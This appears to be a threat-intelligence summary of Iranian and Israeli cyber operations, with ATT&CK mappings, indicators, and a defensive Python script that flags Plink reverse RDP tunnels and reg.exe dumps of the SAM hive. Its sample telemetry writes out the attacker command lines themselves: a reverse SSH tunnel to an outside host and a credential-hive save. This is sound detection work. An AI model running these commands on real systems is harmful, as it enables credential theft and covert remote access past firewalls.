Is Cyber the Next Stage of War in the Middle East Conflict?

The ongoing Middle East conflict involves escalating cyber warfare between Iran and Israel, highlighted by Iranian groups such as Seedworm and by operations such as Predatory Sparrow's attack on the Iranian crypto exchange Nobitex. Seedworm conducts both espionage and destructive attacks; in recent intrusions it routed its traffic through compromised home routers and used tools such as Plink and the commercial Brute Ratel C4 post-exploitation framework ("BruteRatel") to gain a foothold and move laterally through target networks. #Seedworm #PredatorySparrow #Stuxnet

Keypoints

  • The Middle East conflict includes significant cyber warfare activity between Iran and Israel alongside physical hostilities.
  • Stuxnet was a pioneering cyberattack targeting Iranian nuclear enrichment centrifuges, showcasing destructive cyber capabilities.
  • Pro-Israel hackers dubbed Predatory Sparrow destroyed roughly $90 million held by the Iranian crypto exchange Nobitex, sending the funds to unspendable addresses rather than stealing them.
  • The Iranian threat actor Damselfly conducts targeted phishing campaigns against high-profile Israeli individuals.
  • Seedworm (aka MuddyWater) is a prolific Iranian cyber espionage group, also engaging in destructive ransomware-like attacks using DarkBit.
  • Seedworm recently used compromised home routers infected with Mirai malware to proxy attacks and bypass geographic IP tracing.
  • The group used Plink to build reverse RDP tunnels over outbound SSH, the commercial Brute Ratel C4 framework for post-exploitation, and reg.exe to dump the SAM hive for credentials, then moved laterally to SQL and file servers.

MITRE Techniques

  • [T1595.002] Active Scanning: Vulnerability Scanning – Seedworm scanned for vulnerable IIS servers from compromised home routers. Network Sniffing (T1040) does not apply: the routers were used to originate scans, not to capture traffic.
  • [T1190] Exploit Public-Facing Application – Seedworm exploited known vulnerabilities in IIS servers to gain access (‘used a variety of known vulnerabilities to then gain access’).
  • [T1572] Protocol Tunneling – Used Plink to open an outbound SSH connection and carry RDP inside it as a reverse tunnel, sidestepping inbound firewall rules (‘create an outbound SSH connection… that connection is then used to tunnel classic RDP traffic’).
  • [T1090.003] Proxy: Multi-hop Proxy – Attack traffic was relayed through Mirai-infected home routers so that source addresses geolocated to residential networks worldwide rather than to Iran.
  • [T1003.002] OS Credential Dumping: Security Account Manager – Used reg.exe to save the SAM hive and extract credentials from it (‘obtained more credentials using reg.exe, by dumping the SAM’). PowerShell (T1059.001) is not implicated; reg.exe is a built-in command-line utility.
  • [T1003] OS Credential Dumping – Used the Brute Ratel C4 framework (‘used BruteRatel… to obtain credentials’) to harvest further credentials for lateral movement. Despite the name, Brute Ratel is a commercial C2 and post-exploitation framework, not a password-guessing tool, so Brute Force (T1110) does not apply.
  • [T1021.001] Remote Services: Remote Desktop Protocol – Moved laterally over RDP through the reverse tunnel built with Plink (‘created a reverse RDP tunnel… bypassing the firewall’).
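
As an added example, not code from the original article or from Symantec, the following Python sketch shows how the two host-level behaviours above, a Plink reverse RDP tunnel and a reg.exe dump of the SAM hive, could be matched over process-creation telemetry. The events are constructed sample records (hostnames, users and paths are assumptions); the command shapes it matches are the standard ones, `plink -R listen:host:port` for a remote forward and `reg save HKLM\SAM <file>` for a hive dump. It goes slightly beyond the text by also flagging the SYSTEM and SECURITY hives, since SAM hashes cannot be decrypted without the SYSTEM boot key.

```python
import re

# Constructed sample process-creation records (not real telemetry). The
# field layout loosely mirrors Sysmon Event ID 1 / Windows 4688; hostnames,
# users and paths are assumptions made for this example.
SAMPLE_EVENTS = [
    {"host": "FILESRV01", "user": "CORP\\svc_backup",
     "image": r"C:\Users\Public\plink.exe",
     "cmdline": r"plink.exe -N -R 3389:127.0.0.1:3389 -pw hunter2 tunnel@203.0.113.10"},
    {"host": "SQL01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe save HKLM\SAM C:\ProgramData\sam.hiv"},
    {"host": "SQL01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save hklm\system C:\ProgramData\sys.hiv"},
    {"host": "WS042", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"host": "WS042", "user": "CORP\\alice",
     "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": r"plink.exe -batch admin@10.0.0.5 uptime"},
]

# Hives whose on-disk copy yields local credentials: SAM holds the password
# hashes, SYSTEM holds the boot key needed to decrypt them, SECURITY holds
# cached domain logons and LSA secrets.
SENSITIVE_HIVES = re.compile(
    r"\bHK(?:LM|EY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, tolerating both separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_remote_forward(cmdline):
    """Return (listen_port, target_host, target_port) for a plink/ssh -R
    argument, or None. Handles '-R 3389:127.0.0.1:3389' and
    '-R 0.0.0.0:3389:127.0.0.1:3389'; bracketed IPv6 listen addresses are
    out of scope for this sketch."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok == "-R":
            parts = toks[i + 1].split(":")
            if len(parts) >= 3:
                return parts[-3], parts[-2], parts[-1]
    return None


def detect(event):
    """Map one process-creation event to ATT&CK technique IDs.
    Returns a list of (technique_id, reason) tuples."""
    findings = []
    image = basename(event["image"])
    cmd = event["cmdline"]

    # T1003.002: reg.exe saving a credential-bearing hive to a file.
    # Reading these hives needs SYSTEM, so the 'user' field is a triage hint.
    if image == "reg.exe" and re.search(r"\bsave\b", cmd, re.IGNORECASE):
        hive = SENSITIVE_HIVES.search(cmd)
        if hive:
            findings.append(("T1003.002",
                             f"reg save of {hive.group(1).upper()} hive"))

    # T1572: a plink/ssh remote forward turns an outbound SSH session into
    # an inbound path. When the forwarded service is RDP it also enables
    # T1021.001 lateral movement straight through the firewall.
    if image in ("plink.exe", "ssh.exe"):
        fwd = parse_remote_forward(cmd)
        if fwd:
            listen_port, host, port = fwd
            findings.append(("T1572",
                             f"reverse SSH tunnel {listen_port}->{host}:{port}"))
            if port == "3389":
                findings.append(("T1021.001",
                                 "RDP exposed through reverse SSH tunnel"))
    return findings


def triage(events):
    """Run detect() over a batch and return (host, technique, reason) rows."""
    rows = []
    for ev in events:
        for tid, why in detect(ev):
            rows.append((ev["host"], tid, why))
    return rows


if __name__ == "__main__":
    for host, tid, why in triage(SAMPLE_EVENTS):
        print(f"{host:10} {tid:10} {why}")
```

On the constructed sample the two benign events (a registry query and an interactive plink session without port forwarding) produce nothing, while the tunnel on FILESRV01 and the two hive saves on SQL01 each produce a row. Matching on the `-R` argument and on `reg save` of a named hive, rather than on the binary names, is the point: both plink.exe and reg.exe are legitimate, and the proxying through home routers means network-side source addresses are of little use for this activity.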

Indicators of Compromise

  • [File Hashes] None are given in this summary. The malware and tooling named are Mirai (used to compromise the home routers) and the commercial Brute Ratel C4 framework; samples of both change frequently, so hunting on the behaviours above is more durable than matching a fixed hash.
  • [File Names] plink.exe (PuTTY's command-line SSH client) used to tunnel RDP over SSH; reg.exe used to save the SAM hive. Both are legitimate binaries, so the indicator is the usage (plink with -R remote forwarding, reg save of HKLM\SAM), not the file name.
  • [Victim] The Iranian crypto exchange Nobitex was the target of the Predatory Sparrow operation; it is a victim, not attacker infrastructure.
  • [IP Addresses] None are given. Attacks were proxied through numerous compromised home routers worldwide, so source-IP geolocation will not show Iranian addresses and should not be used on its own to attribute or to rule out this activity.

Read more: https://www.security.com/threat-intelligence/cyber-war-middle-east